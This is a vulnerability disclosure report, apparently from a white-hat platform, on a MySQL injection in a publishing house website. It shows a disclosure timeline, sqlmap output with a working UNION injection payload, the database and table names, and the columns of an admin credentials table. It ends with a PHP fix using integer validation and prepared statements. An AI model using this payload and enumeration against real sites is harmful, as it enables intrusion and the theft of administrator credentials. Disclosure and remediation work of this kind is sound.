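2015-11-01: Details reported to the vendor; awaiting vendor handling
2015-11-05: Vendor confirmed; details disclosed to the vendor only
2015-11-15: Details disclosed to core white hats and experts in related fields
2015-11-25: Details disclosed to regular white hats
2015-12-05: Details disclosed to intern white hats
2015-12-20: Details disclosed to the public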
MySQL injection vulnerability at a certain People's Publishing House
Injection point: http://**.**.**.**/news_info.php?typeid=13&id=809
Verified with sqlmap:
[13:59:51] [INFO] GET parameter 'typeid' is 'MySQL UNION query (58) - 1 to 10 columns' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 257 HTTP(s) requests:
---
Parameter: typeid (GET)
    Type: UNION query
    Title: MySQL UNION query (58) - 10 columns
    Payload: typeid=-2639 UNION ALL SELECT 58,58,CONCAT(0x717a717a71,0x7a44535356575659634c,0x7176766271),58,58,58,58,58,58,58#&id=809
---
[14:00:44] [INFO] testing MySQL
[14:01:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[14:01:11] [INFO] confirming MySQL
[14:01:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[14:01:12] [INFO] fetching database names
[14:01:12] [INFO] the SQL query used returns 2 entries
[14:01:22] [INFO] retrieved: information_schema
[14:01:22] [INFO] retrieved: peopledata
available databases [2]:
[*] information_schema
[*] peopledata

Database: peopledata
[8 tables]
+------------------+
| ceo_admin        |
| ceo_link         |
| ceo_list         |
| ceo_list_details |
| ceo_mboard       |
| ceo_type         |
| ceo_user         |
| web_basic_info   |
+------------------+

Database: peopledata
Table: ceo_admin
[12 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| is_active   | int(11)      |
| u_id        | int(11)      |
| u_in_id     | int(11)      |
| user_date   | varchar(250) |
| user_email  | varchar(250) |
| user_mobile | varchar(250) |
| user_name   | varchar(50)  |
| user_pass   | varchar(50)  |
| user_qq     | varchar(250) |
| user_right  | varchar(250) |
| user_tel    | varchar(250) |
| user_zw     | varchar(250) |
+-------------+--------------+
Filtering
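One way to apply the filtering fix to the typeid and id parameters of news_info.php, as an added example that is not part of the original report or the site's code: strict integer validation followed by a bound-parameter query. The ceo_list column names, the helper names read_int_param and fetch_news, and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
// Added example, not the site's code. The ceo_list columns (id, typeid, title)
// are assumed; sample rows are constructed. SQLite in memory stands in for MySQL.

// Return the parameter as an int only if it is a plain positive decimal integer.
function read_int_param(array $query, $name)
{
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null;
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1)));
    return $value === false ? null : $value;
}

// Values are bound as typed parameters and never concatenated into the SQL text.
function fetch_news(PDO $db, $typeid, $id)
{
    $stmt = $db->prepare('SELECT id, typeid, title FROM ceo_list WHERE typeid = :typeid AND id = :id');
    $stmt->bindValue(':typeid', $typeid, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ceo_list (id INTEGER PRIMARY KEY, typeid INTEGER, title TEXT)');
$db->exec("INSERT INTO ceo_list (id, typeid, title) VALUES (809, 13, 'constructed sample row')");

$requests = array(
    'typeid=13&id=809', // the legitimate request shape from the report
    // the typeid value sqlmap reported above, URL-encoded
    'typeid=' . urlencode('-2639 UNION ALL SELECT 58,58,CONCAT(0x717a717a71,0x7a44535356575659634c,0x7176766271),58,58,58,58,58,58,58#') . '&id=809',
);

foreach ($requests as $raw) {
    parse_str($raw, $query);
    $typeid = read_int_param($query, 'typeid');
    $id = read_int_param($query, 'id');
    if ($typeid === null || $id === null) {
        echo "400 Bad Request: typeid and id must be positive integers\n";
        continue;
    }
    $row = fetch_news($db, $typeid, $id);
    echo $row === null ? "404 Not Found\n" : "200 OK: {$row['title']}\n";
}
```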
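Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-11-05 14:26
CNVD confirmed and reproduced the reported vulnerability and has forwarded it to CNCERT for dispatch to the corresponding branch center, which will subsequently coordinate with the organization managing the website to handle it.
None yet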